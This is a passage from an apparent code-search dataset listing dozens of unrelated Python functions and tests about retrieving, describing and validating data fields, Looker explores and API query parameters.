fields:\n response['description'] = request.issue.description\n if 'subject' in fields:\n response['subject'] = request.issue.subject\n return response", "def test_get_featured_front_page_returns_required_fields(self):\r\n\r\n app = self.create_app(None)\r\n app.owner = self.user\r\n db.session.add(app)\r\n featured = Featured(app=app)\r\n db.session.add(featured)\r\n db.session.commit()\r\n fields = ('id', 'name', 'short_name', 'info', 'n_volunteers', 'n_completed_tasks')\r\n\r\n featured = cached_apps.get_featured_front_page()[0]\r\n\r\n for field in fields:\r\n assert featured.has_key(field), \"%s not in app info\" % field", "def test_get_explore_join_stats(fc: fetcher.Fetcher, test_model):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=\"explore_2_joins_1_used\"\n )[0]\n field_stats = {\n \"explore_2_joins_1_used.d1\": 10,\n \"explore_2_joins_1_used.d2\": 5,\n \"explore_2_joins_1_used.d3\": 0,\n \"explore_2_joins_1_used.m1\": 0,\n \"join1.d1\": 10,\n \"join1.d2\": 10,\n \"join1.d3\": 10,\n \"join1.m1\": 0,\n \"join2.d1\": 0,\n \"join2.d2\": 0,\n \"join2.d3\": 0,\n \"join2.m1\": 0,\n }\n join_stats = fc.get_explore_join_stats(explore=explore, field_stats=field_stats)\n assert isinstance(join_stats, dict)\n assert len(join_stats) == 2\n assert join_stats == {\"join1\": 30, \"join2\": 0}", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def get_fields(self, path):\n with self.inspector(path) as opened_file:\n return opened_file.describe_fields()", "def get_query_fields(cls):\n ...", "def _get_fields(self):\n return self._fields", "def get_fields(self):\r\n return self.fields", "def fields(self):", "def _all_fields_all_data():\n # Takes all name fields\n all_fields = PhotoTech.objects.all().values()[0].keys()\n # For all fileds takes all fields data \n all_data = [PhotoView._all_data_fields(x) for x in all_fields]\n allowed_search_fields = ['zoom',\n 'matrix_resol',\n 'color',\n 'matrix_size',\n 'country']\n # Return dict {keys: fields}\n return {x: y for x, y in zip(all_fields, all_data)\n if x in allowed_search_fields}", "def fields(self):\n ...", "def _create_dimension_queries(\n self, explore: Explore, model_name: str\n ) -> List[Query]:\n queries = []\n for dimension in explore.dimensions:\n query = self.client.create_query(model_name, explore.name, [dimension.name])\n query = Query(\n query[\"id\"], lookml_ref=dimension, explore_url=query[\"share_url\"]\n )\n queries.append(query)\n return queries", "def fields(self):\r\n pass", "def get_fields_list(self):\n return self.description[\"fields\"][\"values\"].keys()", "def get_fields(self):\n return self.fields", "def get_fields(self):\n return self.fields", "def listFields(self):\n return self.get_json('/field')", "def fieldsUrl(self):\n return self.lweBaseUrl + \\\n \"/collections/\" + self.collectionName + \\\n \"/fields\"", "def _create_explore_query(self, explore: Explore, model_name: str) -> Query:\n dimensions = [dimension.name for dimension in explore.dimensions]\n query = self.client.create_query(model_name, explore.name, dimensions)\n return Query(query[\"id\"], lookml_ref=explore, explore_url=query[\"share_url\"])", "def getData(self):\n import labstep.entities.experimentDataField.repository as experimentDataFieldRepository\n\n return experimentDataFieldRepository.getDataFields(self)", "def _commercial_fields(self):\n return ['website']", "def GatherPageData(self, mr):\n # TODO(jrobbins): Allow deep-linking into this page.\n canned_query_views = []\n if mr.project_id:\n with mr.profiler.Phase('getting canned queries'):\n canned_queries = self.services.features.GetCannedQueriesByProjectID(\n mr.cnxn, mr.project_id)\n canned_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(canned_queries)]\n\n saved_query_views = []\n if mr.auth.user_id and self.services.features:\n with mr.profiler.Phase('getting saved queries'):\n saved_queries = self.services.features.GetSavedQueriesByUserID(\n mr.cnxn, mr.me_user_id)\n saved_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(saved_queries)\n if (mr.project_id in sq.executes_in_project_ids or\n not mr.project_id)]\n\n return {\n 'issue_tab_mode': 'issueAdvSearch',\n 'page_perms': self.MakePagePerms(mr, None, permissions.CREATE_ISSUE),\n 'canned_queries': canned_query_views,\n 'saved_queries': saved_query_views,\n }", "def get_fields(self):\n \n return self.metadata.keys()", "def get_fields(self):\n return list(self.metadata.keys())", "def get_fields(self, key=None):\n return self._get_query('fields', self._build_params(key=key), Field)", "def fields(request):\n # Only recognizes a few fields for now.\n if request.method != 'POST':\n fields = request.GET.getlist('field')\n response = {}\n if 'reviewers' in fields:\n response['reviewers'] = request.issue.reviewers or []\n if 'description' in fields:\n response['description'] = request.issue.description\n if 'subject' in fields:\n response['subject'] = request.issue.subject\n return response\n\n if not request.issue.edit_allowed:\n if not IS_DEV:\n return HttpTextResponse('Login required', status=401)\n fields = json.loads(request.POST.get('fields'))\n issue = request.issue\n if 'description' in fields:\n issue.description = fields['description']\n if 'reviewers' in fields:\n issue.reviewers = _get_emails_from_raw(fields['reviewers'])\n issue.calculate_updates_for()\n if 'subject' in fields:\n issue.subject = fields['subject']\n issue.put()\n return HttpTextResponse('')", "def _dataset_fields(geno):\n return {'title': geno['title'], 'notes': geno.get('notes', '')}", "def Fields(self):\n return self._fields", "def get_host_data_fields(self):\n\n raise NotImplementedError", "def get_fields(data):\n return data['train'][data['train'].keys()[0]].attrs.keys()", "def get_fields(self, request, obj=None):\n if obj and obj.cwr:\n return (\n 'nwr_rev', 'description', 'works', 'filename', 'view_link',\n 'download_link')\n else:\n return ('nwr_rev', 'description', 'works')", "def listMetaDataFields(self, exclude=True):\n #tool = getToolByName(self, ATCT_TOOLNAME)\n #original_list = tool.getMetadataDisplay(exclude)\n\n return DisplayList((\n ('getAnalysisCategory', _p('Analysis Category')),\n ('getAnalysisService', _p('Analysis Service')),\n ('getAnalysts', _('Analyst')),\n ('getClientOrderNumber', _('Client Order')),\n ('getClientReference', _('Client Reference')),\n ('getClientSampleID', _('Client Sample ID')),\n ('getClientTitle', _('Client')),\n ('getContactTitle', _('Contact')),\n ('Creator', _p('Creator')),\n ('created', _('Date Created')),\n ('getDatePublished', _('Date Published')),\n ('getDateReceived', _('Date Received')),\n ('getDateSampled', _('Date Sampled')),\n ('getProfilesTitle', _('Analysis Profiles')),\n ('getRequestID', _('Request ID')),\n ('getSampleID', _('Sample ID')),\n ('getSamplePointTitle', _('Sample Point')),\n ('getSampleTypeTitle', _('Sample Type')),\n ('review_state', _p('Review state')),\n ))", "def f(self):\r\n return self.fields()", "def _get_fields(self):\n if not self._cursor.description:\n return {}\n\n results = {}\n column = 0\n\n for des in self._cursor.description:\n fieldname = des[0]\n results[column] = fieldname\n column = column + 1\n\n return results", "def get_fields(self, dm_name):\n dm = self.get_dm(dm_name)\n return dm['mdmFields']", "def extract_fields(self, json_dict):\n raise NotImplementedError()", "def readAccessedFields(self):\n pass", "def get_features(self, request, **kwargs):\n raise NotImplementedError()", "def features(self) -> Optional[pulumi.Input['DevToolPortalFeatureSettingsArgs']]:\n return pulumi.get(self, \"features\")", "def get_fields(self, pager=None):\n return Field.deserialize_list(self._get_multiple('fields', {}, pager))", "def test_query_api_result_fields():\n # Pick the first result and test for all fields\n result = query_api(url, \"test\")[0]\n assert all(field in result.keys() for field in fields)", "def fields(self):\r\n return self._by_name.iteritems()", "def get_fields(self):\n\n\t\treturn self.__fields", "def request_fields(self, fields=None):\n # The cursor only works for the 'search' endpoint, just call\n # the 'field' endpoint and return all the field types\n response = self.connection.get_request(self.uri_field)\n if response.status_code != requests.codes.ok:\n logger.warning('JIRA Cloud returned %d for %s', response.status_code, self.uri_field)\n return []\n content = json.loads(response.content)\n # Overwrite some fields\n for c in content:\n if c['name'] == 'Epic Status':\n c['schema']['type'] = 'string'\n c['choices'] = (('To Do', 'To Do'), ('In Progress', 'In Progress'), ('Done', 'Done'))\n elif c['name'] == 'Resolution':\n c['choices'] = self._get_resolutions()\n\n # The KEY field is never returned\n c = {\n \"id\": \"key\",\n \"key\": \"key\",\n \"name\": \"Key\",\n \"custom\": False,\n \"orderable\": True,\n \"navigable\": True,\n \"searchable\": True,\n \"clauseNames\": [\n \"key\",\n ],\n \"schema\": {\n \"type\": \"string\",\n }\n }\n content.append(c)\n # The parent field is never returned\n c = {\n \"id\": \"parent\",\n \"key\": \"parent\",\n \"name\": \"Parent\",\n \"custom\": True,\n \"orderable\": True,\n \"navigable\": True,\n \"searchable\": True,\n \"clauseNames\": [\n \"parent\",\n ],\n \"schema\": {\n \"type\": \"any\",\n \"custom\": \"com.django-atlassian:parent\"\n }\n }\n content.append(c)\n return content", "def QueryFields(self, what, fields=None, reason=None):\n query = []\n _AppendReason(query, reason)\n\n if fields is not None:\n _AppendIf(query, True, (\"fields\", \",\".join(fields)))\n\n return self._SendRequest(HTTP_GET,\n (\"/%s/query/%s/fields\" %\n (GANETI_RAPI_VERSION, what)), query, None)", "def extract(self):\n self.field_list = []\n \n try:\n self.mfields = self.getModel()._meta.fields\n if(self.mfields):\n try:\n for model_fields in self.mfields:\n if(model_fields.name == \"id\"):\n pass \n \n elif(model_fields.name == \"pci\"):\n pass \n elif(model_fields.name == \"sci\"):\n pass \n elif(model_fields.name == \"validated\"):\n pass \n else:\n self.field_list.append(model_fields.name)\n return self.field_list\n except:\n raise \n else:\n return None \n except:\n raise", "def objectFields(self):\n raise NotImplementedError", "def lookml_model_explore_with_http_info(self, lookml_model_name, explore_name, **kwargs):\n\n all_params = ['lookml_model_name', 'explore_name', 'fields']\n all_params.append('callback')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method lookml_model_explore\" % key\n )\n params[key] = val\n del params['kwargs']\n # verify the required parameter 'lookml_model_name' is set\n if ('lookml_model_name' not in params) or (params['lookml_model_name'] is None):\n raise ValueError(\"Missing the required parameter `lookml_model_name` when calling `lookml_model_explore`\")\n # verify the required parameter 'explore_name' is set\n if ('explore_name' not in params) or (params['explore_name'] is None):\n raise ValueError(\"Missing the required parameter `explore_name` when calling `lookml_model_explore`\")\n\n\n collection_formats = {}\n\n resource_path = '/lookml_models/{lookml_model_name}/explores/{explore_name}'.replace('{format}', 'json')\n path_params = {}\n if 'lookml_model_name' in params:\n path_params['lookml_model_name'] = params['lookml_model_name']\n if 'explore_name' in params:\n path_params['explore_name'] = params['explore_name']\n\n query_params = {}\n if 'fields' in params:\n query_params['fields'] = params['fields']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['application/json'])\n\n # Authentication setting\n auth_settings = []\n\n return self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='LookmlModelExplore',\n auth_settings=auth_settings,\n callback=params.get('callback'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)", "def _select_fields(self):\r\n return []", "def fields(self) -> Optional[Sequence['outputs.PropertyDefinitionResponse']]:\n return pulumi.get(self, \"fields\")", "def read_fields(self, limit = 0, collapse = False):\r\n\r\n keys = []\r\n probes = {}\r\n\r\n def probe_record(record, parent = None):\r\n for key, value in record.items():\r\n full_key = parent + \".\" + key if parent else key\r\n\r\n if self.expand and type(value) == dict:\r\n probe_record(value, full_key)\r\n continue\r\n\r\n if not full_key in probes:\r\n probe = brewery.dq.FieldTypeProbe(full_key)\r\n probes[full_key] = probe\r\n keys.append(full_key)\r\n else:\r\n probe = probes[full_key]\r\n probe.probe(value)\r\n\r\n count = 0\r\n for record in self.records():\r\n if collapse:\r\n record = collapse_record(record)\r\n\r\n probe_record(record)\r\n if limit and count >= limit:\r\n break\r\n count += 1\r\n\r\n fields = []\r\n\r\n for key in keys:\r\n probe = probes[key]\r\n field = Field(probe.field)\r\n\r\n storage_type = probe.unique_storage_type\r\n if not storage_type:\r\n field.storage_type = \"unknown\"\r\n elif storage_type == \"unicode\":\r\n field.storage_type = \"string\"\r\n else:\r\n field.storage_type = \"unknown\"\r\n field.concrete_storage_type = storage_type\r\n\r\n # FIXME: Set analytical type\r\n\r\n fields.append(field)\r\n\r\n self.fields = list(fields)\r\n return self.fields", "def test_fields(self):\n form = self._get_form(data=None)\n self.assertEquals(len(form.fields), 4)\n self.assertTrue('tests_url' in form.fields)\n self.assertTrue('repo_url' in form.fields)\n self.assertTrue('pkg_type' in form.fields)\n self.assertTrue('tags' in form.fields)", "def get_fields(request):\n\n json_resp = {}\n json_resp['fields'] = []\n json_resp['fields_to_ann'] = []\n all = request.GET.get('all',None)\n workpath = os.path.dirname(os.path.abspath(__file__)) # Returns the Path your .py file is in\n auto_request = request.GET.get('ns_id', None)\n report = request.GET.get('report', None)\n # print(request.session['report_type'])\n if report is not None or all == 'all':\n if report is not None:\n if report.startswith('PUBMED_'):\n json_resp['fields'] = ['volume','authors','year','journal']\n json_resp['fields_to_ann'] = ['title','abstract']\n else:\n json_resp = get_fields_from_json()\n if all == 'all':\n # All the possible fields for every usecase (MANUAL CONFIGURATION)\n json_resp = get_fields_from_json()\n if Report.objects.filter(institute = 'PUBMED').exists():\n json_resp['all_fields'].extend(['title','abstract','volume','journal','year','authors']) #aggiungo pubmed solo in coda!\n else:\n if request.session['report_type'] == 'pubmed':\n json_resp['fields'] = ['volume','authors','year','journal']\n json_resp['fields_to_ann'] = ['title','abstract']\n else:\n # Fileds related exclusively to a usecase\n json_resp = get_fields_from_json_configuration(request.session['usecase'],request.session['institute'],request.session['language'])\n if request.session['mode'] == 'Robot' or auto_request == 'Robot':\n with open(os.path.join(workpath, './automatic_annotation/auto_fields/auto_fields.json')) as out:\n data = json.load(out)\n json_resp['fields_to_ann'] = data['extract_fields'][request.session['usecase']]\n for el in json_resp['fields_to_ann']:\n if el in json_resp['fields']:\n json_resp['fields'].remove(el)\n # print('FIELDS', json_resp)\n return JsonResponse(json_resp)", "def pull_fields(self, org):\n pass", "def get_readonly_fields(self, request, obj=None):\n if not self.all_fields_readonly or (request.user.is_superuser and self.superuser_skips_all_readonly):\n return self.readonly_fields\n print self.fieldsets\n print list(set(\n [field.name for field in self.opts.local_fields] +\n [field.name for field in self.opts.local_many_to_many]\n ))\n if self.fieldsets:\n return flatten_fieldsets(self.fieldsets)\n \n else:\n return list(set(\n [field.name for field in self.opts.local_fields] +\n [field.name for field in self.opts.local_many_to_many]\n ))", "def test_get(self):\n simple_fields = {\n \"verbose\": False,\n \"min_core_neighbors\": self.min_core_neighbors,\n \"num_features\": 1,\n \"num_unpacked_features\": 2,\n \"num_distance_components\": 1,\n \"radius\": self.radius,\n \"num_examples\": 30,\n }\n\n for field, ans in simple_fields.items():\n self.assertEqual(self.model._get(field), ans, \"{} failed\".format(field))\n\n _list_fields = {\n \"distance\": self.distance,\n \"unpacked_features\": [\"X1[0]\", \"X1[1]\"],\n \"features\": [\"X1\"],\n }\n\n for field, ans in _list_fields.items():\n self.assertItemsEqual(\n self.model._get(field), ans, \"{} failed\".format(field)\n )\n self.assertGreaterEqual(self.model.training_time, 0)\n self.assertGreaterEqual(self.model.num_clusters, 0)\n self.assertEqual(self.model.cluster_id.num_rows(), 30)", "def test_query_meta(self):\n mdata = QueryMetadata('http://localhost:8181')\n\n mdata.load_meta()\n\n for meta in mdata.meta_list:\n # if this is a user entered field it doesn't need to be filled\n if meta.display_type != \"enter\":\n query = mdata.build_query(meta)\n\n mdata.get_list(query)", "def test_get_flat_fields_setting(self):\n # FormOverrideMixIn.get_flat_fields_setting\n pass", "def get_fieldsets(self, request, obj=None):\n if request.user.user_type == User.ADMIN_CEA:\n return self.cea_fieldsets\n elif request.user.user_type == User.ADMIN_CRC:\n return self.crc_fieldsets\n elif request.user.user_type == User.EXPRESS_USER:\n return self.exp_fieldsets\n return self.fieldsets", "def info(self):\n now = datetime.datetime.now().strftime(\"%Y-%m-%d-%HH-%MM-%SS\")\n print(f\"Exploration info ({now})\")\n print(f\"HDF name: {self.HDF_FILE}\")\n print(f\"Trajectory name: {self.trajectoryName}\")\n if self.model is not None:\n print(f\"Model: {self.model.name}\")\n if hasattr(self, \"nRuns\"):\n print(f\"Number of runs {self.nRuns}\")\n print(f\"Explored parameters: {self.exploreParameters.keys()}\")\n if hasattr(self, \"_t_end_exploration\") and hasattr(self, \"_t_start_exploration\"):\n print(f\"Duration of exploration: {self._t_end_exploration-self._t_start_exploration}\")", "def test_search_maxfeatures_only(objectsearch):\n objectsearch.search(max_features=1)", "def getMeasures():", "def ask_for_field(self, row, col):\n field = self.map.fields[row][col]\n # return the field kind, team, and if there is an entity or not\n return field.passable, field.team, field.entity is not None", "def test_get_document_with_fields(index_with_documents):\n response = index_with_documents().get_document(\"500682\", {\"fields\": [\"id\", \"title\"]})\n assert isinstance(response, Document)\n assert hasattr(response, \"title\")\n assert not hasattr(response, \"poster\")\n # assert 'poster' not in response\n assert response.title == \"The Highwaymen\"", "def get_diagnose(visit):\r\n return visit.diagnose.all()", "def experiment_fields(self):\n return {\n 'experiment_name': ['experiments', 'hp_combo_history'],\n 'model_struct': ['experiments', 'hp_combo_history'],\n 'loss_function': ['experiments', 'hp_combo_history'],\n 'regularization_type': ['experiments', 'hp_combo_history'],\n 'regularization_strength': ['experiments', 'hp_combo_history'],\n 'optimizer': ['experiments', 'hp_combo_history'],\n 'lr': ['experiments', 'hp_combo_history'],\n 'dataset': ['experiments', 'hp_combo_history'],\n 'regularization_type_domain': ['experiments', 'hp_combo_history'],\n 'regularization_strength_domain': [\n 'experiments', 'hp_combo_history'],\n 'optimizer_domain': ['experiments', 'hp_combo_history'],\n 'lr_domain': ['experiments', 'hp_combo_history'],\n 'timesteps': ['experiments', 'hp_combo_history'],\n 'timesteps_domain': ['experiments', 'hp_combo_history'],\n 'filter_size': ['experiments', 'hp_combo_history'],\n 'filter_size_domain': ['experiments', 'hp_combo_history'],\n 'u_t_domain': ['experiments', 'hp_combo_history'],\n 'q_t_domain': ['experiments', 'hp_combo_history'],\n 't_t_domain': ['experiments', 'hp_combo_history'],\n 'p_t_domain': ['experiments', 'hp_combo_history'],\n 'u_t': ['experiments', 'hp_combo_history'],\n 'q_t': ['experiments', 'hp_combo_history'],\n 't_t': ['experiments', 'hp_combo_history'],\n 'p_t': ['experiments', 'hp_combo_history'],\n 'hp_optim': ['experiments', 'hp_combo_history'],\n 'hp_max_studies': ['experiments', 'hp_combo_history'],\n 'hp_current_iteration': ['experiments', 'hp_combo_history'],\n 'normalize_labels': ['experiments', 'hp_combo_history'],\n 'experiment_iteration': ['experiments', 'hp_combo_history']\n }", "def EvaluateLocationAndFields(self, *float, **kwargs):\n ...", "def get_fields():\n return jsonify(result=Tree.fields())", "def test_fields(self):\n form = self._get_form(data=None)\n self.assertEquals(len(form.fields), 5)\n self.assertTrue('pkg_type' in form.fields)\n self.assertTrue('name' in form.fields)\n self.assertTrue('tests_url' in form.fields)\n self.assertTrue('repo_url' in form.fields)\n self.assertTrue('tags' in form.fields)", "def test_meta_data_passes_fields(self):\n self.expect_json_http({\"some\": \"value\"},\n uri=re.compile(\".*/articles/1234-56\"))\n\n federalregister.meta_data(\"1234-56\", ['field1', 'field2', 'field3'])\n params = self.last_http_params()\n self.assertEqual(params['fields[]'], ['field1', 'field2', 'field3'])", "def getFieldDetails(self, field_name):\n try:\n value_list = []\n con = self.getMetadataDatabaseConnection()\n results = con.cursor()\n con.cursor().callproc('qiime_assets.get_field_details', [field_name, results])\n\n for row in results:\n # column_name, data_type, desc_or_value, definition, active\n value_list.append((row[0], row[1], row[2], row[3], row[4]))\n \n if len(value_list) == 0:\n # If not found in the dictionary, assume this is a user-created column\n value_list.append((field_name, 'text', '', ''))\n \n return value_list[0]\n except Exception, e:\n print 'Exception caught: %s.\\nThe error is: %s' % (type(e), e)\n return False", "def granule_core_fields(item):\n record = {}\n umm = item.get('umm', {})\n record['GranuleUR'] = umm.get('GranuleUR')\n\n meta = item.get('meta', {})\n record['concept-id'] = meta.get('concept-id')\n record['revision-id'] = meta.get('revision-id')\n record['native-id'] = meta.get('native-id')\n return {key: value for key, value in record.items() if value}", "def test_Fieldform_has_fields(self):\n self.assertSequenceEqual(\n [\n \"date\",\n \"start_time\",\n \"end_time\",\n \"temperature\",\n \"humidity\",\n \"coordinator\",\n \"staff\",\n \"parcel_id\",\n ],\n list(self.Fieldform.fields),\n )", "def EvaluateFields(self, *float, **kwargs):\n ...", "def inspect_model_fields(self, model: ModelRepresentation) -> None:\n c = model.count()\n title(f\"{model.name} ({c})\")\n print(model.fields_info())", "def fieldOfView(self):\n return self._fieldOfView", "def _retrieve_fields(self, scope, fields):\r\n if scope == Scope.user_state:\r\n return self._chunked_query(\r\n StudentModule,\r\n 'module_state_key__in',\r\n (descriptor.scope_ids.usage_id for descriptor in self.descriptors),\r\n course_id=self.course_id,\r\n student=self.user.pk,\r\n )\r\n elif scope == Scope.user_state_summary:\r\n return self._chunked_query(\r\n XModuleUserStateSummaryField,\r\n 'usage_id__in',\r\n (descriptor.scope_ids.usage_id for descriptor in self.descriptors),\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n elif scope == Scope.preferences:\r\n return self._chunked_query(\r\n XModuleStudentPrefsField,\r\n 'module_type__in',\r\n set(descriptor.scope_ids.block_type for descriptor in self.descriptors),\r\n student=self.user.pk,\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n elif scope == Scope.user_info:\r\n return self._query(\r\n XModuleStudentInfoField,\r\n student=self.user.pk,\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n else:\r\n return []", "def get_fields(self, resource):\n\n def _get_fields_key(resource):\n \"\"\"Returns the fields key from a resource dict\n\n \"\"\"\n if resource['code'] in [HTTP_OK, HTTP_ACCEPTED]:\n if (MODEL_RE.match(resource_id) or\n ANOMALY_RE.match(resource_id)):\n return resource['object']['model']['model_fields']\n elif CLUSTER_RE.match(resource_id):\n return resource['object']['clusters']['fields']\n elif CORRELATION_RE.match(resource_id):\n return resource['object']['correlations']['fields']\n elif STATISTICAL_TEST_RE.match(resource_id):\n return resource['object']['statistical_tests']['fields']\n elif STATISTICAL_TEST_RE.match(resource_id):\n return resource['object']['statistical_tests']['fields']\n elif LOGISTIC_REGRESSION_RE.match(resource_id):\n return resource['object']['logistic_regression']['fields']\n elif ASSOCIATION_RE.match(resource_id):\n return resource['object']['associations']['fields']\n elif SAMPLE_RE.match(resource_id):\n return dict([(field['id'], field) for field in\n resource['object']['sample']['fields']])\n else:\n return resource['object']['fields']\n return None\n\n if isinstance(resource, dict) and 'resource' in resource:\n resource_id = resource['resource']\n elif (isinstance(resource, basestring) and (\n SOURCE_RE.match(resource) or DATASET_RE.match(resource) or\n MODEL_RE.match(resource) or PREDICTION_RE.match(resource))):\n resource_id = resource\n resource = self._get(\"%s%s\" % (self.url, resource_id))\n else:\n LOGGER.error(\"Wrong resource id\")\n return\n # Tries to extract fields information from resource dict. If it fails,\n # a get remote call is used to retrieve the resource by id.\n fields = None\n try:\n fields = _get_fields_key(resource)\n except KeyError:\n resource = self._get(\"%s%s\" % (self.url, resource_id))\n fields = _get_fields_key(resource)\n\n return fields", "def get_fields(self):\n\n return self.get_coverage_rangetype()", "def get_viewable_explorations(user_id):\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_viewable_explorations(user_id)]", "def get_fields(model, fields=None):\n include = [f.strip() for f in fields.split(',')] if fields else None\n return utils.get_fields(\n model,\n include\n )", "def _get_repr_body_fields(self) -> List[Tuple[str, Union[str, int, List[str]]]]:\n # Set up fields\n fields = {\n \"Uploader Name\": self.uploader_name,\n \"Metric\": self.task_evaluation_measure,\n \"Run ID\": self.run_id,\n \"Task ID\": self.task_id,\n \"Task Type\": self.task_type,\n \"Task URL\": openml.tasks.OpenMLTask.url_for_id(self.task_id),\n \"Flow ID\": self.flow_id,\n \"Flow Name\": self.flow_name,\n \"Flow URL\": openml.flows.OpenMLFlow.url_for_id(self.flow_id),\n \"Setup ID\": self.setup_id,\n \"Setup String\": self.setup_string,\n \"Dataset ID\": self.dataset_id,\n \"Dataset URL\": openml.datasets.OpenMLDataset.url_for_id(self.dataset_id),\n }\n\n # determines the order of the initial fields in which the information will be printed\n order = [\"Uploader Name\", \"Uploader Profile\", \"Metric\", \"Result\"]\n\n if self.uploader is not None:\n fields[\"Uploader Profile\"] = \"{}/u/{}\".format(\n openml.config.get_server_base_url(), self.uploader\n )\n if self.run_id is not None:\n fields[\"Run URL\"] = self.openml_url\n if self.evaluations is not None and self.task_evaluation_measure in self.evaluations:\n fields[\"Result\"] = self.evaluations[self.task_evaluation_measure]\n elif self.fold_evaluations is not None:\n # -- Add locally computed summary values if possible\n if \"predictive_accuracy\" in self.fold_evaluations:\n # OpenMLClassificationTask; OpenMLLearningCurveTask\n # default: predictive_accuracy\n result_field = \"Local Result - Accuracy (+- STD)\"\n fields[result_field] = self._evaluation_summary(\"predictive_accuracy\")\n order.append(result_field)\n elif \"mean_absolute_error\" in self.fold_evaluations:\n # OpenMLRegressionTask\n # default: mean_absolute_error\n result_field = \"Local Result - MAE (+- STD)\"\n fields[result_field] = self._evaluation_summary(\"mean_absolute_error\")\n order.append(result_field)\n\n if \"usercpu_time_millis\" in self.fold_evaluations:\n # Runtime should be available for most tasks types\n rt_field = \"Local Runtime - ms (+- STD)\"\n fields[rt_field] = self._evaluation_summary(\"usercpu_time_millis\")\n order.append(rt_field)\n\n # determines the remaining order\n order += [\n \"Run ID\",\n \"Run URL\",\n \"Task ID\",\n \"Task Type\",\n \"Task URL\",\n \"Flow ID\",\n \"Flow Name\",\n \"Flow URL\",\n \"Setup ID\",\n \"Setup String\",\n \"Dataset ID\",\n \"Dataset URL\",\n ]\n return [(key, fields[key]) for key in order if key in fields]", "def validate(self, mode: QueryMode = \"batch\") -> Dict[str, Any]:\n self._query_by_task_id = {}\n explore_count = self._count_explores()\n printer.print_header(\n f\"Testing {explore_count} \"\n f\"{'explore' if explore_count == 1 else 'explores'} \"\n f\"[{mode} mode] \"\n f\"[concurrency = {self.query_slots}]\"\n )\n\n self._create_and_run(mode)\n if mode == \"hybrid\" and self.project.errored:\n self._create_and_run(mode)\n\n for model in sorted(self.project.models, key=lambda x: x.name):\n for explore in sorted(model.explores, key=lambda x: x.name):\n message = f\"{model.name}.{explore.name}\"\n printer.print_validation_result(\n passed=not explore.errored, source=message\n )\n\n return self.project.get_results(mode)", "def trace_all_fields(opt_model):\n osp = opt_model.optical_spec\n fld, wvl, foc = osp.lookup_fld_wvl_focus(0)\n fset = []\n for f in osp.field_of_view.fields:\n rset = trace_field(opt_model, f, wvl, foc)\n fset.append(rset)\n\n fdf = pd.concat(fset, keys=osp.field_of_view.index_labels,\n names=['field'])\n return fdf", "def test_get_interesting_mapping_fields(self):\r\n # all columns are completely unique\r\n d = parse_mapping_file(self.mapping_f1)\r\n actual = get_interesting_mapping_fields(d[0], d[1])\r\n expected = []\r\n self.assertEqual(actual, expected)\r\n\r\n # all columns are completely identical\r\n d = parse_mapping_file(self.mapping_f2)\r\n actual = get_interesting_mapping_fields(d[0], d[1])\r\n expected = []\r\n self.assertEqual(actual, expected)\r\n\r\n # some columns retained\r\n d = parse_mapping_file(self.mapping_f3)\r\n actual = get_interesting_mapping_fields(d[0], d[1])\r\n expected = ['Something', 'days_since_epoch']\r\n self.assertEqual(actual, expected)", "def describe_fields(self):\n opened_file = self.data\n description = []\n\n if not opened_file:\n opened_file = self.open()\n\n for n in range(0, opened_file.GetLayerCount()):\n layer = opened_file.GetLayer(n)\n layer_description = {'name': layer.GetName(),\n 'feature_count': layer.GetFeatureCount(),\n 'fields': [],\n 'index': n,\n 'geom_type': self.geometry_type(layer.GetGeomType())\n }\n\n layer_definition = layer.GetLayerDefn()\n for i in range(layer_definition.GetFieldCount()):\n field_desc = {}\n field = layer_definition.GetFieldDefn(i)\n field_desc['name'] = field.GetName()\n field_desc['type'] = field.GetFieldTypeName(i)\n layer_description['fields'].append(field_desc)\n\n description.append(layer_description)\n\n return description", "def test_getknowndata(self):\n result = recordparser.getfields(self.rawdata, self.fieldmap,\n self.sourcekeys)\n self.assertEqual(self.knownvalues, result)", "def get_fields(self, request, obj=None):\n if obj:\n return self.fields\n return self.add_fields", "def get_fields():\n if not request.is_xhr:\n abort(403)\n fields = Field.query.all()\n result = {field.id:field.name for field in fields}\n return jsonify(result)", "def test_max_features_first_page(\n self, mp_wfs, mp_get_schema, mp_remote_describefeaturetype,\n mp_wfs_max_features, mp_remote_wfs_paged_feature):\n s = BoringSearch()\n df = s.search(return_fields=['pkey_boring'], max_features=5)\n assert len(df) == 5", "def _explore(self, explore_iterable):\n if self.v_locked:\n raise pex.ParameterLockedException(\n \"Parameter `%s` is locked!\" % self.v_full_name\n )\n\n if self.f_has_range():\n raise TypeError(\n \"Your parameter `%s` is already explored, \"\n \"cannot _explore it further!\" % self._name\n )\n\n if self._data is None:\n raise TypeError(\n \"Your parameter `%s` has no default value, please specify one \"\n \"via `f_set` before exploration. \" % self.v_full_name\n )\n\n data_list = self._data_sanity_checks(explore_iterable)\n\n self._explored_range = data_list\n self._explored = True\n self.f_lock()", "def fields(self):\r\n if not hasattr(self, '_fields'):\r\n self._fields = dict((clean_field_title(pc.title), pc.get_content())\r\n for pc in self.pagecontent_set.all())\r\n\r\n return self._fields", "def advanced_features(self):\n return self._advanced_features", 